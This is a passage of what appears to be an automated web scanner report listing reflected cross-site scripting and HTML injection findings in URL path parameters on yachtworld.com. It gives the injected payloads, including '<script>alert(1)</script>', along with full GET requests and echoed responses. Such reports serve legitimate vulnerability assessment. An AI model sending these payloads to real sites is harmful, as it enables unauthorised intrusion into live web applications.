Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:36 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type198b2"><a>c472289651c/Luhrs/1">
...[SNIP]...

3.254. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Luhrs/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f26"><a>fd135ab7ca9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Luhrsa5f26"><a>fd135ab7ca9/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

3.255. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Luhrs/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a4d"><script>alert(1)</script>f60a43e4d8c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Luhrs/197a4d"><script>alert(1)</script>f60a43e4d8c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:54 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Luhrs/197a4d"><script>alert(1)</script>f60a43e4d8c/A-1">
...[SNIP]...

3.256. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Mainship/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 111bb"><script>alert(1)</script>7f05fb0b328 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type111bb"><script>alert(1)</script>7f05fb0b328/Mainship/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:57 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type111bb"><script>alert(1)</script>7f05fb0b328/260+Cruiser">
...[SNIP]...

3.257. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Mainship/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65bea"><a>df426e6317b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Mainship65bea"><a>df426e6317b/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Mainship65bea"><a>df426e6317b/A-1">
...[SNIP]...

3.258. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Mainship/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acdd3"><script>alert(1)</script>dca333328d7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Mainship/1acdd3"><script>alert(1)</script>dca333328d7 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 